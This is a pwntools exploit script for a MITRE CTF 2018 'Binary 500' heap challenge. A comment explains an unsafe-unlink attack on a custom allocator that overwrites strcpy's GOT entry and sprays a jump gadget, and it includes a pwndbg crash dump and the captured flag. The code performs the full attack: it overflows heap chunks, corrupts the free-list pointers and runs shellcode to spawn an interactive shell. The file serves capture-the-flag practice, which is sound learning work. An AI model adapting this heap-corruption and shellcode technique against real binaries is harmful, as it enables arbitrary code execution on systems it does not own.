MITRE CTF 2018 Binary 500 solution

pwn500.py

# -*- coding: utf-8 -*-
from pwn import *
'''
 > x86, no protections
 > Custom heap
 > Out of bounds write
 > Unsafe Unlink
 > rwx heap+stack

struct chunk{
  int size
  * fd
  * bk
  space
}
Solution : 
[+] Allocate a few chunks
[+] Overflow into the next chunk to replace fd and bk with GOT['strcpy'] and shellcode jump address.
[+] spray a region with asm("jmp dword[esp+8]")
[+] trigger strcpy with controlled parameter as shellcode


crash state
*EAX  0x61616168 ('haaa')
 EBX  0x0
*ECX  0x0
*EDX  0x61616169 ('iaaa')
 EDI  0xf7721000 (_GLOBAL_OFFSET_TABLE_) ◂— mov    al, 0x1d /* 0x1b1db0 */
 ESI  0xf7721000 (_GLOBAL_OFFSET_TABLE_) ◂— mov    al, 0x1d /* 0x1b1db0 */
*EBP  0xff856518 —▸ 0xff856948 —▸ 0xff856d68 ◂— 0x0
*ESP  0xff856508 ◂— 0xa /* '\n' */
*EIP  0x8048c05 (free+51) ◂— mov    dword ptr [eax + 8], edx
[────────────────────────────────────────────────────DISASM─────────────────────────────────────────────────────]
 ► 0x8048c05 <free+51>        mov    dword ptr [eax + 8], edx
   0x8048c08 <free+54>        cmp    dword ptr [ebp - 0xc], 0
   0x8048c0c <free+58>        je     free+69                       <0x8048c17>
    ↓
   0x8048c17 <free+69>        push   dword ptr [ebp - 4]
   0x8048c1a <free+72>        call   deflag_inuse                  <0x8048adf>
 
   0x8048c1f <free+77>        add    esp, 4
   0x8048c22 <free+80>        jmp    free+83                       <0x8048c25>
    ↓
   0x8048c25 <free+83>        leave  
   0x8048c26 <free+84>        ret    
 
   0x8048c27 <read_line>      push   ebp
   0x8048c28 <read_line+1>    mov    ebp, esp
[─────────────────────────────────────────────────────STACK─────────────────────────────────────────────────────]
00:0000│ esp  0xff856508 ◂— 0xa /* '\n' */
01:0004│      0xff85650c ◂— 0x61616169 ('iaaa')
02:0008│      0xff856510 ◂— 0x61616168 ('haaa')
03:000c│      0xff856514 —▸ 0x950c43c ◂— 0x61616167 ('gaaa')
04:0010│ ebp  0xff856518 —▸ 0xff856948 —▸ 0xff856d68 ◂— 0x0
05:0014│      0xff85651c —▸ 0x80486da (harvest_farm+130) ◂— add    esp, 0x10
06:0018│      0xff856520 —▸ 0x950c448 ◂— 0x6161616a ('jaaa')
07:001c│      0xff856524 ◂— 0x4
[───────────────────────────────────────────────────BACKTRACE───────────────────────────────────────────────────]
 ► f 0  8048c05 free+51
   f 1  80486da harvest_farm+130
   f 2  80489fc main+247
   f 3 f7587637 __libc_start_main+247
Program received signal SIGSEGV (fault address 0x61616170)
pwndbg> cyclic -l 0x61616168
28
pwndbg> cyclic -l 0x61616169
32
$ cat flag
[DEBUG] Sent 0x9 bytes:
    'cat flag\n'
[DEBUG] Received 0x16 bytes:
    'MCA{E80369241F67CE85}\n'
MCA{E80369241F67CE85}
'''

context(arch='i386', os='linux', log_level='debug')
e = ELF("./test")
write_here = e.got['strcpy']

# dirty hack 
# $ socat TCP-LISTEN:5000,reuseaddr,fork EXEC:"ssh [email protected]"
s = remote("127.0.0.1", 5000)

def malloc(n):
    s.recvuntil("> ")
    s.sendline("1")
    s.recvuntil(": ")
    s.sendline(str(n))

def free(idx):
    s.recvuntil("> ")
    s.sendline("2")
    s.recvuntil(": ")
    s.sendline(str(idx))

def fill(idx, ctx):
    s.recvuntil("> ")
    s.sendline("3")
    s.recvuntil(": ")
    s.sendline(str(idx))
    s.recvuntil(": ")
    s.sendline(str(len(ctx)))
    s.recvuntil(": ")
    s.sendline(str(ctx))

malloc(20)
malloc(20)
malloc(20)
malloc(20)
malloc(20)
malloc(20)
malloc(20)
malloc(20)


fill(0, ("\xff\x64\x24\x08"*0x100))
fill(3, cyclic(28)+p32(write_here-8))
free(4)
fill(0, asm(shellcraft.i386.linux.sh()))
s.interactive()